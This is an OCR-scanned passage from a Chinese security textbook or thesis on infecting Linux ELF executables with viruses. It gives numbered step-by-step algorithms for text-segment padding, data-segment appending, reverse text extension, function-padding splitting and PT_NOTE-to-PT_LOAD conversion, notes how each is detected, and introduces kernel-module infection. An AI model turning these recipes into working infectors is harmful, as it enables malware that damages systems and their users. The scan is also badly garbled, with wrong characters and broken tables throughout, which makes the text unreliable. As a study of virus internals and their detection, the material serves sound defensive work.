修改 其 中 的 sh_offset 和 sh_size, 以 及 使 sh_entsize 和 sh_addralign 为 0。 

@ 填充 包含 额外 区 域 放 在 文件 尾部 。 

该 算法 实验 程序 成 功 , 但 同上 面 方法 一 样 仅 对 部 分 程序 有 效 。 现 在 有 两 个 . comment， 
也 是 不 正常 的 情况 ,很 容易 被 发 现 。 因 此 隐藏 性 好 的 病毒 要 利用 下 面 的 高 级 的 技术 来 实现 。 


4.5.2 利用 ELF 格式 的 感染 方法 


与 ELF 格式 相关 的 感染 方法 , 比 4. 5.1 节 的 感染 方法 要 复杂 很 多 ,需要 根据 ELF 格式 
来 改变 ELF 格式 内 容 , 从 而 使 病毒 代码 和 和 宿主 代码 共存 ,并 且 病 毒 代码 执行 结束 后 能 顺利 
交接 控制 权 给 宿主 。 辐 ELF 文件 中 插入 寄生 病毒 代码 要 求 窒 主 文件 和 病毒 体 都 是 完整 的 ， 
因此 插入 的 病毒 代码 会 造成 段 的 使 用 大 小 增加 。 

理论 上 ELF 规范 非常 自由 。 节 和 段 的 位 置 .内 容 以 及 顺序 都 没有 被 限制 。 但 事实 上 一 
个 操作 系统 只 使 用 一 种 程序 加 载 器 .一 种 连接 顺和 很 少 的 几 种 编译 器 。 这 使 得 病毒 编写 工 
作 更 加 简单。 我 们 可 以 使 用 事实 上 的 标准 , 那 只 是 ELF 标准 的 一 个 子 集 。 在 典型 的 操作 系 
统 中 ,只 有 很 少 一 部 分 的 程序 才 会 违反 这 些 事实 上 的 标准 。 所 以 忽略 那些 违反 标准 的 程序 ， 
并 不 会 降低 病毒 生存 的 机 会 。 

所 有 对 执行 程序 必要 的 信息 , 即 ELF 头 以 及 程序 头 表 都 会 塞 进 第 一 个 页 面 (在 i386 上 
是 0x1000) ,可 能 是 为 了 简化 一 个 操作 系统 中 可 执行 文件 格式 检测 需 的 设计 。 动 态 链 接 执 
行 需要 的 头 比 静 态 执行 要 多 一 点 ,这 是 因为 动态 链接 执行 所 需要 的 特殊 节 和 段 的 原因 。 在 
任何 情况 下 ,文本 段 的 程序 头 后 面 接着 数据 段 的 程序 头 。 静 态 执行 的 文本 段 在 0 号 索引 的 
人 位置。 动态 链接 可 执行 部 分 在 2 号 索引 位 置 。 

一 般 情况 下 ,一 个 进程 映像 至 少 包 含 一 个 文本 段 (Text Segment) 和 一 个 数据 段 (Data 
Segment) ,这 两 个 段 的 类 型 都 是 PT_LOAD, 并 且 具 有 不 同 的 权限 ,文本 段 具有 可 执行 权 
限 ,但 不 具有 可 写 权 限 。 数 据 段 具有 可 读 写 权限 ,默认 可 执行 。 一 个 目标 文件 中 的 段 通常 包 
含 一 个 或 者 多 个 节 。 通 常情 况 下 , 段 的 内 容 、 段 中 节 的 顺序 和 成 员 可 能 会 有 所 不 同 , 并 且 处 
理 硕 的 不 同 也 会 影 啊 段 的 内 容 。 

文本 段 包 含 只 读 的 指令 和 数据 ,包含 的 内 容 还 有 ELF 头 以 及 一 些 动 态 链接 信息 。 通 稼 
包括 以 下 各 节 , 文 本 段 是 可 加 载 的 段 , 如 表 4-1 所 示 。 

数据 段 包 括 可 写 的 指令 和 数据 ,包含 以 下 的 一 些 节 ,同样 也 是 可 加 载 的 段 , 如 表 4-2 所 示 。 
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表 4-1 文本 段 常见 内 容 表 4-2 数据 段 的 常见 内 容 
节 注 释 节 注 释 

. text 可 执行 指令 
.d 

. rodata 只 读数 据 Ee 初始 化 了 的 数据 

. hash 符号 哈 希 表 . dynamic 动态 链接 信息 

. dynsym | 动态 链接 符号 表 

.dynstr | 用 于 动态 链接 的 字符 串 全 局 偏 移 表 

. plt 过 程 链接 表 (procedure linkage table) b 将 出 现在 程序 内 存 影 像 中 的 未 初 
. bss 

. rel. got | .got 的 重 定位 信息 始 化 数据 


由 于 文本 段 具 有 的 内 存 访问 权限 为 r_x, 即 只 读 可 执行 权限 ,因此 很 显然 修改 的 病毒 体 
代码 不 能 够 直接 在 文本 段 中 使 用 ,数据 段 的 权限 是 rw_。 内 存 映像 中 的 段 并 没有 完全 用 到 
所 有 的 内 存 , 段 的 结尾 处 很 少 完全 占 到 一 个 页 面 的 边界 处 。 系 统 对 这 些 空 际 使 用 填充 来 完 
成 。 并 且 两 个 段 之 间 也 存在 空 际 , 数 据 段 经 常 紧 接着 文本 段 , 文 本 段 的 开始 处 通常 在 一 个 页 
面 的 开始 处 ,但 数据 段 起 始 地 址 并 不 一 定 由 页 面 开 始 处 开始 。 在 x86 架构 中 ,数据 段 需要 足 
够 多 的 内 存 空间 来 增长 ,如 . bss 这 一 类 的 不 占 文件 空间 却 占 内 存 空间 的 节 , 因 此 栈 一 般 放 
在 内 存 的 顶端 ,向 下 增长 。 简 化 情况 下 ,两 个 段 之 间 的 填充 空间 如 表 4-3 所 示 。 


表 4-3 文本 段 .数据 段 之 间 的 填充 区 


-一 六 一 TERRY 
文本 段 T: 文本 段 代码 
TTTTTTTTTTTTTTTTTPPPPP edt 
pe PPPPPPDDDDDDDDDDDDDD es 
DDDDDDDDDDDDDDDDDDD 


一 个 简单 的 ELF 文件 格式 可 以 简化 成 如 表 4-4 所 示 。 
表 4-4 ELF 文件 简化 格式 


ELF Header Segment2( 数 据 段 ) 数据 段 
Program header table 程序 头 表 Section header table 节 头 表 
srementl( 文 本 县) 用 加油 


感染 ELF 文件 便 可 以 利用 这 些 填充 区 ,或 者 其 他 的 填充 区 ,如 因数 对 齐 的 填充 区 ,尽管 
很 小 ,但 数目 很 多 ,也 是 可 以 利用 的 。 另 外 一 种 思路 便 是 利用 一 些 节 ,扩展 或 者 奉 代 这 些 
节 ,将 病毒 代码 放 和 人 其 中 ,例如 ,对 可 执行 文件 执行 时 关系 不 大 的 . note 节 便 可 以 成 为 利 
用 的 对 象 。 当 然 ,熟悉 ELF 格式 的 人 会 发 现在 ELF 文件 中 存在 很 多 种 途径 可 以 被 病毒 
体 利用 。 

下 面 详细 介绍 的 内 容 中 ,前 四 部 分 全 部 是 利用 填充 区 进行 病毒 感染 的 ,后 面 介绍 利用 
. note 节 和 系统 调用 劫持 方法 进行 的 感染 算法 。 


1. 文本 段 之 后 填充 


这 种 方法 最 初 来 源 于 Silvio Cesare 的 经 典 文 章 , 这 个 UNIX 病毒 研究 的 奠基 者 在 他 的 
两 篇 文章 中 都 提 到 了 他 利用 这 种 方法 感染 的 VIT 病毒 ,可 以 说 这 是 相关 ELF 感染 中 较为 
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常用 的 方法 。 

Silvio Cesare 在 他 的 文章 UNIX ELF parasites and virus 和 UNIX viruses 中 分 别 对 
这 种 感染 方法 进行 描述 ,并 且 总 结 出 极为 精 悍 的 具体 实现 方法 。 

这 种 ELF 感染 方法 是 利用 在 可 以 提供 合适 的 承载 空间 的 文本 段 的 末尾 进行 页 面 填充 
的 方法 。 

在 ELF 文件 中 ,每 一 个 段 都 有 一 个 虚拟 地 址 与 它 的 起 始 位 置 相 关联 。 绝 对 代码 提 及 每 
个 段 是 允许 并 且 可 能 的 。 在 段 边 绿 进行 页 面 填充 为 太 二 合适 的 寄生 代码 提供 一 个 实用 的 位 
置 。 这 个 空间 不 会 影 啊 原 来 的 段 , 没 有 要 求 重 新 定位 。 下 面 介 绍 选择 文本 段 末 尾 进行 填充 。 
对 于 ELF 文件 感染 ,在 文本 段 末 尾 进 行 填充 是 一 个 可 行 的 解决 办 法 。 

在 未 感染 之 前 ELF 文件 结构 类 如 表 4-4 所 示 。 下 面 的 节 被 称 为 额外 的 节 , 这 些 额 外 的 
节 ( 不 属于 任何 一 个 段 ) 是 调试 信息 、 符 号 表 等 这 些 信息 。 一 个 段 涉 表 告诉 系统 如 何 建立 进 
程 镜像 。 用 来 建立 进程 镜像 的 文件 (执行 一 个 程序 ) 必 须 有 一 个 段 表 , 重 定位 文件 则 不 需要 。 
一 个 节 头 表 包 含 描述 文件 节 的 信息 。 每 一 节 都 在 这 个 表 中 有 一 个 人 口 表 项 。 每 一 个 人 口 表 
项 提供 了 类 似 节 名 字 节 大 小 这 样 的 信息 。 文 件 链接 时 必须 有 一 个 节 表 头 , 其 他 的 可 执行 目 
标 文 件 和 可 重 定 位 文件 可 有 可 无 。 

一 个 ELF 目标 文件 可 能 会 指定 程序 人 口 地 址 ,控制 程序 的 虚拟 内 存 地 址 。 因 此 激活 感 
染 代码 ,程序 流 必 须 包 含 新 的 感染 代码 。 这 可 以 通过 修改 入 口 地 址 在 ELF 中 直接 指向 寄生 
代码 ,然后 寄生 代码 需要 负责 让 源 文 件 代 码 执行 一 一 基本 上 就 是 当 寄 生 代 码 执行 完 之 后 将 
程序 控制 权 交 回 源 代码 。 具 体 算法 描述 如 下 。 

(1) 在 文本 段 末 尾 插 和 代码 有 以 下 几 件 事 需要 做 。 

Q@ 增加 ELF header 中 的 p_shoff 以 包含 新 代码 。 

@@ 定位 text segment program header, 增 加 p_filesz 算 入 新 代码 ; 增加 p_memsz 算 人 
新 代码 。 

@) 对 于 文本 段 phdr 之 后 的 其 他 phdr 修正 p_offset。 

由 对 于 那些 因 插入 寄生 代码 影响 俩 移 的 每 节 的 shdr 修正 sh_offset。 

G@) 在 文件 中 物理 地 插 和 人 寄生 代码 到 这 个 位 置 。 

(2) 根据 ELF 规范 ,p_vaddr 和 Pp_offset 在 phdr 中 必须 与 模 page size 相等 。 


p_vaddr (mod PAGE SIZE) = p_ offset (mod PAGE SIZE) 


意味 着 任何 文本 段 后 面 插入 的 代码 都 要 等 于 模 page size。 这 并 不 表示 文本 段 只 能 以 这 
个 数值 增 大 ,只 是 物理 文件 需要 这 样 而 已 。 

一 个 完整 的 页 必须 在 填充 中 使 用 ,因为 要 求 的 vaddr 不 可 用 。 

进程 镜像 加 载 新 的 代码 并 且 在 源 文 件 代 码 之 前 执行 新 代码 是 一 件 很 容易 的 事 , 只 要 修 
改 ELF 头 中 的 entry point 并 使 病毒 跳 转 到 原 人 口 地址 。 

新 的 入 口 地 址 由 文本 段 p_vaddr 十 p_filesz( 源 文件 ) 决 定 。 所 有 这 些 完 成 后 ,新 代码 连 
接 到 原 主体 段 ,然后 完成 感染 代码 。 

尽管 编程 很 完美 ,但 新 代码 加 在 文本 段 后 仍然 会 引起 怀疑 ,因为 这 段 代码 不 属于 任何 一 
个 节 。 扩 展 入 口 点 关联 的 节 很 容易 ,但 文本 段 最 后 一 节 仍 然 会 引起 怀疑 。 将 新 代码 关联 到 
一 个 节 上 必须 要 完成 ,因为 像 strip 这 样 的 程序 使 用 的 是 节 表 ,而 不 是 段 表 。 
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寄生 如 上 述 算法 所 描述 的 那样 ,感染 病毒 的 实现 并 不 成 问题 。 跳 过 不 具有 足够 填充 空 
间 的 可 执行 文件 ,可 以 被 简单 地 解决 。 也 可 以 存在 多 次 感染 ,但 被 感染 的 次 数 受 到 寄生 代码 
尺寸 的 限制 。 人 简单 地 说 ,尺寸 越 大 的 病毒 能 够 感染 的 可 执行 文件 越 少 。 

根据 本 节 的 算法 ,寄生 代码 插入 后 ,ELF 文件 的 布局 如 表 4-5 所 示 。 


表 4-5 文本 段 后 填充 感染 


段 注 释 
ELF header ELF 头 
Program header table 程序 头 表 
Segmentl 答 主 文本 段 
寄生 代码 寄生 代码 (恶意 代码 ) 
Segment2 数据 段 
Section header table 节 头 表 
Extra sections 附加 表 


利用 表 4-6 来 描述 ,如 表 4-6 所 示 。 
表 4-6 文本 段 后 填充 感染 后 的 段 间 布 局 


T: 文本 段 代 码 
文本 和 ee 
V: 病毒 代码 


二 
最 终 算法 描述 如 下 。 

(1) 增加 ELF header 中 的 e_shoff 增 大 PAGESIZE 大 小 。 

(2) 修正 插入 代码 使 其 能 够 跳 转 到 原 主体 代码 的 入 口 点 。 


(3) 定位 文本 段 程序 头 : 修改 ELF 头 的 入 口 点 地 址 指 癌 新 的 入 口 点 (p_vaddr 十 
p_filesz) ; 增加 p_filesz 包含 新 代码 。 

(4) 增加 p_memsz 包含 新 代码 。 

(5) 对 于 文本 段 最 后 一 节 的 shdr: 增 大 sh_size 加 上 寄生 代码 的 大 小 。 

(6) 对 于 文本 段 之 后 的 phdr: 增加 p_offset 加 上 PAGESIZE 大 小 。 

(7) 对 于 那些 因 插 入 寄生 代码 而 影响 偏 移 的 每 个 节 的 shdr: 增加 sh_offset 加 上 
PAGESIZE 大 小 。 

(8) 在 文件 中 物理 地 搬入 寄生 代码 ,并 且 填 充 到 一 个 页 大 小 。 位 置 处 于 文本 段 的 
p_offset 加 上 原来 的 p_filesz 的 偶 移 位 置 。 

这 里 需要 注意 ,有 些 段 的 起 始 地 址 位 于 文本 段 的 结尾 之 前 ,但 在 程序 头 表 中 排序 在 文本 
段 之 后 ,对 于 这 样 的 段 程序 头 , 根 据 代 码 实 现 会 被 发 现 也 会 被 改变 ,如 NOTE 段 , 但 并 没有 
影响 最 终 感染 结果 的 实现 。 因 为 这 一 类 的 段 并 没有 在 程序 运行 中 起 到 某 些 关键 作用 。 因 此 
可 以 忽略 这 个 问题 。 

另 一 个 要 注意 的 问题 就 是 病毒 大 小 与 可 执行 文件 的 关系 , 当 可 执行 文件 中 文本 段 最 后 
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一 个 内 存 页 中 填充 的 空间 与 数据 段 第 一 个 页 的 填充 空间 的 和 小 于 病毒 的 大 小 时 将 不 能 进行 
感染 ,原因 是 数据 段 和 文本 段 之 间 在 内 存 中 的 对 齐 填充 是 一 个 页 面 大 小 ,但 是 在 文件 中 两 个 
段 之 间 是 没有 这 个 页 面 大 小 的 间 隐 的 ,是 紧 挨 看 的 ,所 以 可 以 在 文件 中 的 这 两 者 之 间 插 入 一 
个 页 面 大 小 ,但 是 病毒 的 大 小 却 不 能 超过 前 述 的 范围 ,一旦 超过 导致 的 后 果 就 是 病毒 进入 了 
数据 段 与 文本 段 定义 的 填充 对 齐 页 ,从 而 便 会 导致 病毒 超过 部 分 无 法 执行 ,结果 导致 严重 的 
段 错 误 (Segmentation Fault) 。 

2. 数据 段 之 后 插入 感染 


扩展 数据 段 也 是 可 行 的 ,但 并 不 建议 这 样 做 。 因 为 有 些 实施 内 存 保护 的 UNIX 中 数据 
段 是 不 可 执行 的 。 

在 数据 段 默认 可 执行 的 UNIX 系统 中 , 癌 数 据 段 之 后 填充 病毒 是 可 以 实现 的 。 通 过 扩 
展 数 据 段 包含 进 插入 的 寄生 代码 来 感染 文件 。 

要 扩展 数据 段 意 味 着 必须 对 程序 头 表 和 ELF 头 进行 修改 ,才能 使 ELF 可 执行 文件 以 
及 病毒 体 都 能 够 正常 执行 。 需 要 注意 的 是 ,. bss 节 通 常 是 数据 段 的 最 后 一 节 , 正 常 的 情况 
下 这 个 节 用 来 结束 数据 段 ,在 这 个 节 中 用 来 存放 未 初始 化 的 数据 ,并且 不 占有 文件 空间 ,但 
却 占 有 内 存 空 间 的 特殊 节 。 如 琳 需 要 扩充 数据 段 , 必 须 留 下 足够 的 空间 给 . bss 市 。 因 此 ， 
在 定义 新 的 病毒 体 插 入 点 时 ,应 该 插入 的 位 置 是 数据 段 的 (p_vaddr 十 p_memsz) 而 不 是 
p_vaddr 十 p_filesz) 。 感 染 后 的 内 存 映像 如 表 4-7 所 示 。 


表 4-7 数据 段 后 插入 寄生 代码 后 的 文件 映像 


段 注 释 
ELF header ELF 头 
Program header table 程序 头 表 
Segmentl 段 1 
Segment2 宿主 数据 段 
寄生 代码 寄生 代码 (恶意 代码 ) 
Section header table 节 头 表 
Extra sections 附加 节 


这 里 举例 介绍 这 种 感染 方法 ,使 用 的 例子 是 可 执行 文件 df。 

插入 点 后 面 的 内 容 就 是 两 个 不 属于 任何 段 的 节 252 字 节 ,以 及 节 头 表 1120 字 节 ,加 在 
一 起 正好 是 1372 字 节 , 即 文件 大 小 减 去 数据 段 偏 移 再 减 去 数据 段 文件 占有 大 小 的 值 。 即 数 
据 段 后 面 已 经 没有 其 他 的 段 了 ,因此 可 以 不 用 管 下 面 的 第 4 步 。 

根据 上 面 的 分 析 , 现 在 算法 比较 明朗 了 。 

具体 的 实现 算法 如 下 。 

(1) 修改 病毒 代码 ,使 病毒 代码 执行 后 能 够 跳 转 到 原来 的 入口 点 。 

(2) 定位 数据 段 : 修改 ELF 头 中 的 入 口 点 ,指向 新 的 代码 , 即 数据 段 末 尾 处 (p_vaddr 十 
p_memsz); 修改 e_shoff 字段 指 回 新 的 节 头 表 偶 移 量 , 即 原 来 的 加 上 加 入 的 病毒 大 小 和 bss 
段 大 小 。 

(3) 对 于 数据 段 程序 头 : 增加 p_filesz 用 来 包括 新 的 代码 和 . bss 节 ; 增加 p_memsz 包 
含 新 的 代码 ; 计算 .bss 节 的 大 小 (p_memsz 一 p_filesz)。 
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(4) 对 于 任何 一 个 搬入 点 后 节 的 节 头 shdr: 增加 sh_offset, 增 加 数值 为 病毒 大 小 与 
.bss 节 大 小 的 和 。 

(5) 物理 地 插入 病毒 代码 到 文件 中 : 移动 节 头 表 以 及 其 他 两 个 不 属于 任何 段 的 节 。 

读者 可 以 根据 上 述 算法 的 描述 进行 编程 实验 。 感 染 过 程 以 及 感染 前 后 的 变化 可 以 通过 
readelf 工具 观察 。 本 算法 进行 数据 段 感染 成 功 的 前 提 是 数据 段 的 代码 具有 默认 可 执行 权 
限 , 要 求 数据 段 内 代码 可 执行 ,一般 数 据 段 的 权限 是 RW( 可 读 可 写 ), 有 些 操作 系统 默认 可 
执行 ,有 些 则 不 是 。 

在 某 些 规定 数据 段 的 代码 是 不 可 执行 的 操作 系统 上 时 ,该 病毒 体 代码 是 没有 办 法 成 功 
执行 的 ,因此 在 这 一 类 操作 系统 中 是 无 法 进行 本 类 感染 的 。 但 可 以 考虑 实现 在 文本 段 后 以 


填充 方法 进行 感染 。 
通过 实例 来 解释 分 析 感 当 过 程 。 


这 个 算法 在 FC6 系统 上 实现 时 ,感染 过 的 ELF 可 执行 文件 虽然 经 过 strip 后 仍然 不 会 
改变 大 小 ,但 是 strip 命令 执行 时 会 报 一 个 错误 , 且 没 有 解决 这 个 错误 的 方法 。 

这 样 的 算法 可 以 在 某 些 操作 系统 上 的 ELF 文件 上 实现 ,但 是 被 感染 后 的 文件 是 存在 前 
面 简 单 感染 方法 中 讲述 的 strip 问题 的 ,因为 用 strip 命令 检测 这 个 被 感染 文件 会 把 所 有 没 
有 属于 任何 节 的 病毒 代码 都 删除 ,会 导致 程序 执行 错误 。 解 决 这 个 问题 的 方法 是 可 以 建立 
一 个 新 的 节 ,但 同时 会 造成 其 他 的 问题 ,需要 修改 很 多 地 方 来 实现 。 

综 上 所 述 , 这 类 病毒 不 仅 适 用 范围 相对 比较 罕 ,而 且 检 测 很 容易 ,只 需要 strip 命令 或 者 
只 要 查看 一 下 ELF 头 中 的 和 人口 点 是 否 正 篆 指 癌 , 即 和信 口 点 是 否 指 回 文本 段 中 的 内 容 就 可 以 
检测 到 。 该 算法 实现 的 复杂 度 与 前 面 讲述 的 文本 段 填充 相当 ,安全 性 与 无 关 ELF 感染 方法 
差不多 ,所 以 实现 这 类 的 病毒 得 不 偿 失 ,只 是 一 种 探索 的 方 回 而 已 。 或 许 在 技术 和 ELF 格 
式 有 所 发 展 的 时 候 , 这 种 类 似 思路 的 感染 方法 会 有 所 应 用 ,目前 的 状态 不 太 可 能 存在 这 类 病 
毒 产 生 的 可 能 性 。 


3. 文本 段 之 前 插入 感染 


可 以 考虑 在 文本 段 前 部 植 和 人 病毒 体 , 这 样 修 改 后 的 程序 人 口 点 依旧 在 文本 段 ,而 不 是 数 
据 段 。 

新 的 文本 段 病毒 感染 方法 是 将 文本 段 向 低地 址 扩展 ,并 且 使 病毒 代码 在 扩展 的 空间 内 
执行 。 感 染 后 的 文件 映像 如 表 4-8 所 示 。 


表 4-8 文本 段 前 插入 寄生 代码 后 的 文件 映像 


段 注 释 
ELF header ELF 头 
Program header table 程序 头 表 
寄生 代码 寄生 代码 (恶意 代码 ) 
Segmentl( 文 本 段 ) 文本 段 
Segment2( 数 据 段 ) 数据 段 
Section header table 节 头 表 


Extra sections 附加 节 
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文本 段 之 前 的 感染 方法 就 是 简单 地 向 文本 段 前 部 区 域 插入 病毒 代码 ,ELF 头 以 及 程序 
头 表 必须 复制 到 新 的 被 感染 的 文件 的 首部 。 然 后 紧 随 其 后 的 是 病毒 体 代码 ,最 后 才 是 原文 
件 的 内 容 。 

对 于 插入 的 病毒 体 代码 必须 要 有 一 个 节 来 包含 这 些 代 码 ,否则 会 被 strip 程序 处 理 掉 ， 
所 以 可 以 选择 创建 一 个 新 节 或 者 扩展 文本 段 中 的 某 一 节 来 包含 这 部 分 代码 ,但 这 两 种 方法 
实现 结束 后 都 比较 容易 被 发 现 。 总 之 ,这 种 感染 方法 实现 难度 大 ,并 且 被 发 现 的 概率 大 , 因 
此 与 前 面 两 种 方法 做 比较 ,本 课题 的 病毒 实现 部 分 选择 前 面 两 个 作为 病毒 感染 方法 来 演示 。 

具体 算法 描述 如 下 。 

(1) 修改 病毒 代码 使 病毒 代码 能 够 执行 完 后 跳 转 到 原来 的 入 口 地 址 。 

(2) 修正 ELF 头 中 的 e_shoff 来 包含 新 的 代码 。 

(3) 定位 文本 段 : 修正 文本 段 p memsz 和 p filesz, 增 大 PAGESIZE 大 小 ; 修正 该 程序 
涉 的 p_vaddr p_paddr。 

(4) 对 任何 插入 点 之 后 的 段 的 程序 头 phdr: 增加 p_offset 来 算 入 新 的 代码 ; 还 应 修改 
p_vaddr 和 p_paddr 与 偶 移 成 模 运 算 关 系 。 

(5) 对 任何 插入 点 之 后 的 节 的 节 头 shdr: 增加 sh_offset 来 算 入 新 的 代码 。 

(6) 物理 地 插入 病毒 代码 到 文件 中 ,填充 到 PAGESIZE 大 小 ,将 病毒 体 及 填充 插 在 
ELF 头 和 程序 头 表 之 后 的 区 域 。 

4. 利用 函数 对 齐 填充 区 感染 

下 面 的 内 容 是 关于 利用 田 数 填充 区 的 感染 方法 。 主 要 参考 Hermlt 的 文章 Infecting 
ELF— files using function padding for Linuz, 以 及 Ares 的 文章 Static linked ELF 
infecting ,在 第 一 篇 文章 中 ,Hermlt 介绍 了 一 种 利用 为 了 了 黄 数 对 齐 而 填充 的 小 块 区 域 来 感 
染病 毒 的 方法 。 

图 数 对 齐 与 页 面 对 齐 的 目的 一 样 ,都 是 为 了 提高 代码 的 性 能 才 采 取 的 措施 。 在 许多 架 
构 中 ,因数 首部 也 做 对 齐 处 理 , 尤 其 当 gcc 使用-O2 及 其 以 上 优化 开关 的 时 候 , 所 以 函数 首 
部 前 面 有 部 分 填充 区 可 利用 。 

我 们 所 关注 的 是 代码 中 的 对 齐 是 如 何 实现 的 。 在 一 些 简单 的 困 数 中 存在 的 对 齐 有 数 个 
字 市 。 这 部 分 空间 可 以 用 来 插入 自己 的 代码 。 但 是 不 同 程 序 中 函数 的 填充 空间 大 小 是 由 多 
种 因素 决定 的 ,如 编译 需 、 编 译 时 的 选项 ,以 及 操作 系统 结构 等 。 利 用 果 数 填充 区 感染 病毒 
的 原理 是 由 于 函数 填充 区 一 般 较 小 ,需要 将 病毒 分 割 成 几 个 段 ,修改 每 段 最 后 部 分 ,添加 跳 
转 语句 ,将 病毒 各 个 段 分 别 放 进 不 同 的 函数 填充 区 内 ,然后 类 似 于 前 面 几 种 感染 方法 ,修改 
ELF 文件 头 中 的 入 口 点 地 址 , 指 问 病毒 入 口 点 ,并 使 病毒 最 后 一 段 执行 结束 后 能 够 跳 转 到 
原来 的 箱 主 程序 人 口 点 。 因 此 ,这 种 方法 并 不 需要 像 页 面 填 充 那 样 修改 节 以 及 段 的 程序 头 ， 
但 是 这 种 感染 方法 最 麻烦 的 地 方 在 于 需要 修改 和 分 割 病 毒 代码 ,而 对 这 些 代 码 ,修改 的 不 是 
像 程 序 头 和 节 头 那样 的 C 数据 结构 而 是 二 进 制 的 代码 ,一般 使 用 内 艇 汇编 方式 或 者 直接 在 
C 语言 中 进行 计算 机 语言 代码 查找 蔡 换 操作 实现 这 种 修改 ,更 加 复杂 烦琐 。 

其 他 的 相关 问题 是 对 于 函数 填充 区 的 空间 大 小 也 是 有 限制 的 ,必须 能 足够 容纳 一 条 跳 
转 语 句 (jmp ) ,并 且 对 填充 空间 的 查找 也 是 需要 对 模式 匹配 以 及 对 函数 二 进 制 代码 特性 的 
了 解 。 在 二 进 制 代码 中 定位 一 块 大 于 X 字 市 的 函数 对 其 填充 区 的 确 比 较 困 难 , 并 且 将 病毒 
代码 按 需 要 分 段 修改 青 链接 起 来 也 是 相当 费时 的 事情 。 所 以 这 类 病毒 效率 比较 低 , 编 程 难 
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度 也 比较 大 。 

在 文本 段 中 ,病毒 被 放置 在 某 些 函数 末尾 的 填充 区 内 ,通常 情况 下 ,静态 链接 的 libc 后 
数 更 有 可 能 成 为 这 一 类 的 目标 ,因为 这 种 图 数 多 数 都 有 能 够 比较 容易 检测 到 的 标识 (如 系统 
调用 ) ,并 且 填 充 区 相对 比较 大 。 

具体 感染 算法 如 下 。 

(1) 从 当前 进程 中 取出 病毒 代码 ,查找 合适 的 未 被 感染 的 ELF 可 执行 文件 作为 宿主 文 
件 ,并 修改 病毒 体 , 使 其 执行 完 后 能 够 跳 转 至 宿主 文件 代码 入 口 点 。 

(2) 查找 宿主 文件 函数 填充 区 ,找到 足够 大 的 函数 填充 区 并 记录 。 

(3) 将 病毒 体 分 割 。 

(4) 将 分 割 后 的 病毒 放 入 宿主 文件 多 个 函数 填充 区 内 ,并 在 每 一 块 后 设置 跳 转 指 令 , 使 
其 各 部 分 相连 接 。 

(5) 修订 入 口 点 ,使 其 指 癌 病 毒 体 入 口 点 。 

5. 利用 NOTE 段 或 者 扩展 . note 节 

利用 PT_NOTE 类 型 的 段 来 进行 的 病毒 感染 方法 主要 参考 Alexander Bartolich 写 的 
The ELF Virus Writing HOWTO 中 关于 利用 NOTE 段 的 内 容 以 及 Hermlt 所 与 的 病毒 
adhoca 源 公 。 

向 一 个 ELF 可 执行 文件 中 插入 第 二 个 可 执行 的 文本 段 将 是 一 种 感染 方法 。 但 是 第 二 
个 文本 段 需要 使 用 一 个 已 经 存在 的 程序 头 , 因 为 插入 新 的 程序 头 需要 做 的 改动 将 大 大 增加 
被 发 现 的 可 能 性 。 经 过 查找 发 现 类 型 为 NOTE 的 段 的 程序 头 可 以 被 替换 掉 。 这 种 方法 的 
好 处 显而易见 ,插入 的 病毒 代码 不 受 空间 的 影响 但 是 很 容易 被 检测 到 。 因 为 这 种 感染 方法 
会 造成 普通 的 ELF 可 执行 文件 中 出 现 3 个 LOAD 类 型 的 段 , 而 不 是 正常 情况 下 的 两 个 。 

在 ELF 文档 中 对 PT_NOTE 类 型 的 段 以 及 SHT_NOTE 类 型 的 节 的 描述 为 : 类 型 为 
SHT_NOTE 和 PT_NOTE 的 节 区 可 以 用 作 特 殊 信 息 的 存放 。 节 区 和 程序 头 部 中 的 注释 信 
息 可 以 有 任意 多 个 条 目 , 每 个 条 目 都 是 一 个 按 目标 处 理 需 格式 给 出 的 4 字 节 的 数组 。 

通过 利用 这 个 段 ,将 其 修改 为 PT_LOAD 类 型 便 可 以 达到 加 载 到 内 存 中 并 执行 的 效果 。 

简单 算法 描述 : 查找 文件 中 的 PT_NOTE 类 型 的 段 , 修 改 PT_NOTE 类 型 段 程序 头 中 
的 字段 ,重点 字段 需要 修改 p_type 为 PT_LOAD, 并 将 其 他 字段 修改 为 合适 的 值 ,然后 将 
ELF 头 中 的 e_entry 字段 修改 为 PT_NOTE 段 的 p_vaddr 值 ,即使 病毒 程序 先 于 宿主 程序 
执行 ,修改 病毒 程序 使 其 执行 结束 后 能 够 跳 转 到 原 人 口 地 址 。 然 后 插入 病毒 体 到 文本 段 中 
的 相应 位 置 。 

在 Hermlt 所 写 的 病毒 adhoca 中 实现 该 感染 方法 时 需要 用 到 ld 脚本 来 定位 病毒 体 起 
始 位 置 , 以 及 病毒 体 的 大 小 。 

另 一 种 利用 扩展 . note 节 的 感染 方法 是 通过 扩展 . note 节 来 包含 进 病毒 代码 的 ,从 而 达 
到 病毒 植 人 宿主 的 目的 而 不 被 strip 程序 发 现 。 这 种 方法 实现 时 同时 要 移动 . note 节 后 面 
的 各 个 节 以 及 节 头 表 。 但 是 这 种 方法 会 造成 . note 节 大 小 异常 ,从 而 很 容易 被 readelf 以 及 
objdump 一 类 的 工具 发 现 。 


4.5.3 高 级 感染 技术 
前 面 两 节 描述 的 感染 技术 最 多 只 能 感染 一 些 应 用 程序 ,因此 只 是 停留 在 感染 用 户 层次 
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上 的 可 执行 文件 , 硅 上 升 到 内 核 层 次 就 需要 感染 内 核 的 模块 。 对 Linux 最 致命 的 病毒 攻击 
方式 就 是 感染 Linux 内 核 ,也 就 是 使 用 Linux 的 LKM.。 

另外 一 种 用 户 层 次 上 的 高 级 感染 方法 是 通过 截获 PLT 或 者 GOT 表 来 实现 ,关于 这 两 
者 的 基础 知识 可 以 查看 本 文 第 2 章 相 关内 容 , 此 处 不 再 袭 述 。 

1. LKM 感染 技术 

LKM 就 是 Loadable Kernel Module, 直 详 就 是 可 加 载 内 核 模 块 。 目 前 发 现 的 很 多 后 门 
程序 ,Rootkit 一 类 的 程序 都 是 使 用 LKM 作为 主要 攻击 手段 。LKM 在 Linux 操作 系统 中 
被 广泛 使 用 ,主要 的 原因 就 是 LKM 具有 相对 灵活 的 使 用 方式 和 强大 的 功能 ,可 以 被 动态 地 
加 载 ,而 不 需要 重新 编译 内 核 。 同 样 ,在 另 一 方面 , 它 对 于 病毒 而 言 , 也 有 很 多 好 处 ,如 隐 藏 
文件 和 进程 等 ,但 是 使 用 LKM 是 比较 麻烦 的 ,需要 较 高 的 技术 要 求 。 

LKM 内 核 模块 也 属于 ELF 目标 文件 ,但 是 又 区 别 于 一 般 的 应 用 程序 ,属于 系统 级 别 的 
